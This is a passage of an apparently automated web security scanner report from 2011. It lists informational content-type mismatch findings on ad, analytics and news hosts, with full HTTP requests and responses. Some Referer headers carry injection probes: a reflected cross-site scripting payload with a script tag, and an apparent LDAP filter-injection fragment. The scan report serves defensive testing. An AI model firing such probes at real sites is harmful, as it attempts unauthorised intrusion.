Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:27:29 GMT
Server: Apache
DL_S: a211
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 164
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


34.19. http://api.bit.ly/shorten

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /shorten HTTP/1.1
Host: api.bit.ly
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:21:50 GMT
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 104
Allow: GET, HEAD, POST
P3P: CP="CAO PSA OUR"
Set-Cookie: _xsrf=442abb1a273f4a0d80590533c0eff126; Path=/

{"errorCode": 203, "errorMessage": "You must be authenticated to access shorten", "statusCode": "ERROR"}

34.20. http://ar.voicefive.com/b/rc.pli

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p85001580&1296351015841 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:30:17 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

34.21. http://b.rad.redacted/ADSAdClient31.dll

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b.rad.redacted
Path:   /ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVSRQ&AP=1025 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2136
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8010639-T28253488-C93000000000038010
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:27:25 GMT
Content-Length: 2136


//<![CDATA[
function getRADIds() { return{"adid":"93000000000038010","pid":"8010639","targetid":"28253488"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...

34.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

34.23. http://cartoonblog.msnbc.redacted/_vine/printer

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cartoonblog.msnbc.redacted
Path:   /_vine/printer

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /_vine/printer?call=streamSessionObjects&sectionDomain=cartoonblog&path=/ HTTP/1.1
Host: cartoonblog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 17:55:05 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 460

{"cpk":{"version":"23247"},"conf":{"matchPath":"\/_login\/proxy?path=","mediaRoot":"http:\/\/www.polls.newsvine.com","useHTTPS":true,"bootstrapRoot":"\/_nv","vineRoot":"http:\/\/www.newsvine.com\/_vin
...[SNIP]...

34.24. http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /42EBFC62-1F4E-11E0-AB70-41F5E4064C68

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /42EBFC62-1F4E-11E0-AB70-41F5E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:39 GMT
Server: Barista/1.1-(eanibm)
Connection: Close
Content-Length: 7634
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid300x250slateplain-42EBFC62-1F4E-11E0-AB70-41F5E4064C68 { width: 300px; left: 0; font-family: sans-serif; position: relative; displa
...[SNIP]...

34.25. http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /517F9430-C0FA-11DF-831B-94A93FF5047F

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /517F9430-C0FA-11DF-831B-94A93FF5047F HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:40 GMT
Server: Barista/1.1-(eanlbh)
Connection: Close
Content-Length: 5210
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: fc_ms_1.3=EA; domain=.pulse360.com; path=/; expires=Sun, 06-Feb-2011 01:19:40 GMT

document.write('<style type="text/css"> div#p360-SL660x75msnbc-517F9430-C0FA-11DF-831B-94A93FF5047F { width: 660px; left: 0; font-family: sans-serif; position: relative; float: none;
...[SNIP]...

34.26. http://context3.kanoodle.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Firm
Host:   http://context3.kanoodle.com
Path:   /cgi-bin/context.cgi

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/context.cgi?id=1000&db=context&query=*general_network:premium&cgroup=d_usnews&format=standard&numresults=5&linkcolor=003399&titlecolor=003399&fontsize=11&textcolor=666666 HTTP/1.1
Host: context3.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/search_spy.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Barista/1.1-(eanhbn)
Connection: Close
Content-Length: 3946
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css">.listing { background-color: #FFFFFF; font-size: 11px; font-family: ; width: 100%; border: 1px solid #FFFFFF; padding-left: 5px; }.listing_title {
...[SNIP]...

34.27. http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Summary

Severity:   Information
Confidence:   Firm
Host:   http://engine2.adzerk.net
Path:   /z/8277/adzerk1_2_4_43,adzerk2_2_17_45

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /z/8277/adzerk1_2_4_43,adzerk2_2_17_45?keywords=php,facebook,iframe,facebook-like HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:12:42 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 2200
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...

34.28. http://engine2.adzerk.net/z/8277/adzerk2_2_17_45

Summary

Severity:   Information
Confidence:   Firm
Host:   http://engine2.adzerk.net
Path:   /z/8277/adzerk2_2_17_45

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /z/8277/adzerk2_2_17_45 HTTP/1.1
Host: engine2.adzerk.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sun, 30 Jan 2011 15:11:30 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: StackOverflow=9ca49ffc9f664387a222c78c37b5b08e; path=/
X-AspNet-Version: 2.0.50727
Content-Length: 1497
Connection: keep-alive

function cssLoad(css){var s=document.createElement('style');document.getElementsByTagName('head')[0].appendChild(s);if(!!window.ActiveXObject){document.styleSheets[document.styleSheets.length-1].cssTe
...[SNIP]...

34.29. http://english.aljazeera.net/Media/ver2/Images/1pximage.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://english.aljazeera.net
Path:   /Media/ver2/Images/1pximage.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /Media/ver2/Images/1pximage.png HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 09:47:37 GMT
Cache-Control: public, max-age=86400
Content-Length: 43
Content-Type: image/png
Last-Modified: Sun, 29 Aug 2010 07:37:00 GMT
Accept-Ranges: bytes
ETag: "0f629f74c47cb1:f49"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 18227
X-Cache: HIT from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

GIF89a.............!.......,...........D..;

34.30. http://english.aljazeera.net/Services/IncludePart/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://english.aljazeera.net
Path:   /Services/IncludePart/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Services/IncludePart/?T=3&Id=201113085252994161&P=&V=2&AjaxRequestUniqueId=12963989224411 HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=258846558.1296398916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258846558.2101007970.1296398916.1296398916.1296398916.1; __utmc=258846558; __utmb=258846558.1.10.1296398916

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:47:47 GMT
Expires: Sun, 30 Jan 2011 14:53:47 GMT
Date: Sun, 30 Jan 2011 14:51:30 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 35
X-Cache: MISS from 12.120.11.23
Via: 1.1 12.120.11.23:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!-- PAGELOADEDSUCCESSFULLY-->

34.31. http://english.aljazeera.net/Services/IncludePart/LevelOne/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://english.aljazeera.net
Path:   /Services/IncludePart/LevelOne/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Services/IncludePart/LevelOne/?T=7&Id=2008521161625794450&P=&V=2&AjaxRequestUniqueId=12963989224410 HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=258846558.1296398916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258846558.2101007970.1296398916.1296398916.1296398916.1; __utmc=258846558; __utmb=258846558.1.10.1296398916

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:47:47 GMT
Expires: Sun, 30 Jan 2011 14:53:47 GMT
Date: Sun, 30 Jan 2011 14:51:30 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 1714
X-Cache: MISS from 12.120.11.61
Via: 1.1 12.120.11.61:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<link href="/Styles/Menu.css" rel="stylesheet" type="text/css" />
<link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" />

<noscript>
<div class="Height10"><!-- --></div>
<table c
...[SNIP]...

34.32. http://geo.eyewonder.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://geo.eyewonder.com
Path:   /

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /?ddata=country HTTP/1.1
Host: geo.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://cdn.eyewonder.com/100125/767752/1419198/300x250_shell.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; ewroi=""

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 120
Expires: Sun, 30 Jan 2011 17:59:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 30 Jan 2011 17:59:53 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="UTF-8"?>
<geoInfo clientIP="173.193.214.243">
<country>US</country>
</geoInfo>

34.33. http://i1.silverlight.net/avatar/anonymous.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i1.silverlight.net
Path:   /avatar/anonymous.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /avatar/anonymous.jpg?forceidenticon=True&dt=634319214000000000&cdn_id=12152010 HTTP/1.1
Host: i1.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 10000
Content-Type: image/png
Last-Modified: Sat, 29 Jan 2011 22:45:16 GMT
ETag: anonymous.True
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20510.895
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=3562
Expires: Sun, 30 Jan 2011 00:14:10 GMT
Date: Sat, 29 Jan 2011 23:14:48 GMT
Connection: close

GIF89a;.;.......... A|)P....*R.Vy.%H....(N...."E.......%J.'L....!B.h..s.....w..#F....+T.,T.`.....<b.....@z...6X.4\....Ad.Gl.......(M..?z"D.......'M.+S.&K.&K.............+T..............?y.........|...
...[SNIP]...

34.34. http://i3.silverlight.net/avatar/anonymous.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i3.silverlight.net
Path:   /avatar/anonymous.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /avatar/anonymous.jpg?forceidenticon=True&dt=634319217000000000&cdn_id=12152010 HTTP/1.1
Host: i3.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Length: 10000
Content-Type: image/png
Last-Modified: Sat, 29 Jan 2011 22:45:16 GMT
ETag: anonymous.True
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20510.895
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Cache-Control: public, max-age=3580
Expires: Sun, 30 Jan 2011 00:15:02 GMT
Date: Sat, 29 Jan 2011 23:15:22 GMT
Connection: close

GIF89a;.;.......... A|)P....*R.Vy.%H....(N...."E.......%J.'L....!B.h..s.....w..#F....+T.,T.`.....<b.....@z...6X.4\....Ad.Gl.......(M..?z"D.......'M.+S.&K.&K.............+T..............?y.........|...
...[SNIP]...

34.35. http://info.ooyala.com/info/secondary/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://info.ooyala.com
Path:   /info/secondary/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

